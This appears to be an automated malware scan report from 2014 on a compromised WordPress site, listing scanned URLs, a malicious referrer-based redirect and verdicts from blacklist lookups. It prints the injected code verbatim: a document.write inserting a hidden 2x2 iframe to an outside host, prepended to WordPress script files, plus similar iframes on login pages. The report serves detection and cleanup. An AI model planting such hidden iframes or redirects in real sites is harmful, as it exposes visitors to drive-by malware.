Malicious/Suspicious Redirects
| Request | Server response | Status |
URL: http://psychicreadingsonline.net/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: psychicreadingsonline.net Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Tue, 24 Jun 2014 04:51:06 GMT Location: http://wiltonct.us/ccpn.html?h=853178 Server: Apache Content-Length: 296 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
| Request | Server response | Status |
http://psychicreadingsonline.net/ | 200 OK Content-Length: 6038 Content-Type: text/html | clean |
http://psychicreadingsonline.net/?page_id=2 | 200 OK Content-Length: 7611 Content-Type: text/html | clean |
http://psychicreadingsonline.net/wp-includes/js/l10n.js?ver=20101110 | 200 OK Content-Length: 478 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://clubatleticoestrada.org.ar/awpu.html?j=853177></iframe>');
function convertEntities(b){var d,a;d=function(c){if(/&[^;]+;/.test(c)){var f=document.createElement("div");f.innerHTML=c;return !f.firstChild?c:f.firstChild.nodeValue}return c};if(typeof b==="string"){return d(b)}else{if(typeof b==="object"){for(a in b){if(typeof b[a]==="string"){b[a]=d(b[a])}}}}return b}; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://clubatleticoestrada.org.ar/awpu.html?j=853177 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://clubatleticoestrada.org.ar/awpu.html?j=853177> | ||
http://psychicreadingsonline.net/wp-includes/js/comment-reply.js?ver=20090102 | 200 OK Content-Length: 956 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://clubatleticoestrada.org.ar/awpu.html?j=853177></iframe>');
addComment={moveForm:function(d,f,i,c){var m=this,a,h=m.I(d),b=m.I(i),l=m.I("cancel-comment-reply-link"),j=m.I("comment_parent"),k=m.I("comment_post_ID");if(!h||!b||!l||!j){return}m.respondId=i;c=c||false;if(!m.I("wp-temp-form-div")){a=document.createElement("div");a.id="wp-temp-form-div";a.style.display="none";b.parentNode.insertBefore(a,b)}h.parentNode.insertBefore(b,h.nextSibling);if(k&&c){k.value=c}j.value=f;l.style.display="";l.onclick=function(){var n=addComment,e=n.I("wp-temp-form-div"),o=n.I(n.respondId);if(!e||!o){return}n.I("comment_parent").value="0";e.parentNode.insertBefore(o,e);e.parentNode.removeChild(e);this.style.display="none";this.onclick=null;return false};try{m.I("comment").focus()}catch(g){}return false},I:function(a){return document.getElementById(a)}}; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://clubatleticoestrada.org.ar/awpu.html?j=853177 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://clubatleticoestrada.org.ar/awpu.html?j=853177> | ||
http://psychicreadingsonline.net/wp-admin/ | HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Tue, 24 Jun 2014 04:51:08 GMT Pragma: no-cache Location: http://psychicreadingsonline.net/wp-login.php?redirect_to=http%3A%2F%2Fpsychicreadingsonline.net%2Fwp-admin%2F&reauth=1 Server: Apache Content-Length: 0 Content-Type: text/html Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Tue, 24 Jun 2014 04:51:09 GMT | clean |
http://psychicreadingsonline.net/wp-login.php?redirect_to=http%3a%2f%2fpsychicreadingsonline.net%2fwp-admin%2f&reauth=1 | 200 OK Content-Length: 2364 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://nasaspinesurgeons.com/hzgu.html?i=853177 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://nasaspinesurgeons.com/hzgu.html?i=853177> | ||
http://psychicreadingsonline.net/wp-login.php?action=lostpassword | 200 OK Content-Length: 1997 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://nasaspinesurgeons.com/hzgu.html?i=853177 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://nasaspinesurgeons.com/hzgu.html?i=853177> | ||
http://psychicreadingsonline.net/wp-login.php | 200 OK Content-Length: 2364 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://nasaspinesurgeons.com/hzgu.html?i=853177 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://nasaspinesurgeons.com/hzgu.html?i=853177> | ||
http://psychicreadingsonline.net/test404page.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 24 Jun 2014 04:51:11 GMT Location: http://psychicreadingsonline.net/test404page.js/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://psychicreadingsonline.net/xmlrpc.php | clean |
http://psychicreadingsonline.net/test404page.js/ | 200 OK Content-Length: 6038 Content-Type: text/html | clean |
http://psychicreadingsonline.net/?p=1 | 200 OK Content-Length: 9138 Content-Type: text/html | clean |
http://psychicreadingsonline.net/?author=1 | 200 OK Content-Length: 6467 Content-Type: text/html | clean |
http://psychicreadingsonline.net/?cat=1 | 200 OK Content-Length: 6362 Content-Type: text/html | clean |
http://psychicreadingsonline.net/?m=201108 | 200 OK Content-Length: 6161 Content-Type: text/html | clean |
http://psychicreadingsonline.net/?p=1&replytocom=1 | 200 OK Content-Length: 9206 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=psychicreadingsonline.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://psychicreadingsonline.net/
Result: psychicreadingsonline.net is not infected or malware details are not published yet.
Result: psychicreadingsonline.net is not infected or malware details are not published yet.